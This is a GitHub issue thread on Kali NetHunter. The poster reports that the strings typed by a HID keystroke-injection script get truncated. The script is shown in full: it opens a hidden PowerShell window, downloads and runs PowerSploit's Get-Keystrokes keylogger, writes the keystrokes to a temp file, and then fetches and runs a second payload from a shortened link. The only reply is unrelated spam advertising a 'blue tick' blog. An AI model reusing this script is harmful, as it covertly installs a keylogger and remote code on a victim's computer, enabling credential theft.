### ISSUE TITLE
Bug when executing scripts with NetHunter HID

### ISSUE THREAD

**Issue by emileNetter** [offensive-security/kali-nethunter#833]
### Device:
Nexus 4

### OS version (KitKat/Lollipop/Marshmallow/Nougat):
5.1.1

### Built from repo (date and build command) or downloaded from website (links):
https://www.offensive-security.com/kali-linux-nethunter-download/

### Output of `cat /proc/version` in adb shell or NetHunter Terminal:
Linux version 3.4.0-kali-g23ba62d

## Issue:
I have issues when running this script 
 
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle hidden
ENTER
DELAY 300
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
DELAY 300
STRING Get-Keystrokes -LogPath $env:temp\key.txt 
DELAY 500
ENTER
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/*****')
DELAY 800
ENTER

The two first strings are typed correctly in the PS console but  the last one is cut so the script isn't working. Most of the time the last one is like this : IEX (New-Obj/goo.gl/*****') then it goes to the next line : >> .DownloadString('https://goo.gl/*****'). 

Did anyone had this issue before ?

**Comment by suzainkhan** [comment]
You can get blue tick from here 
https://junaidmugloo.blogspot.in/p/settings.html?m=1
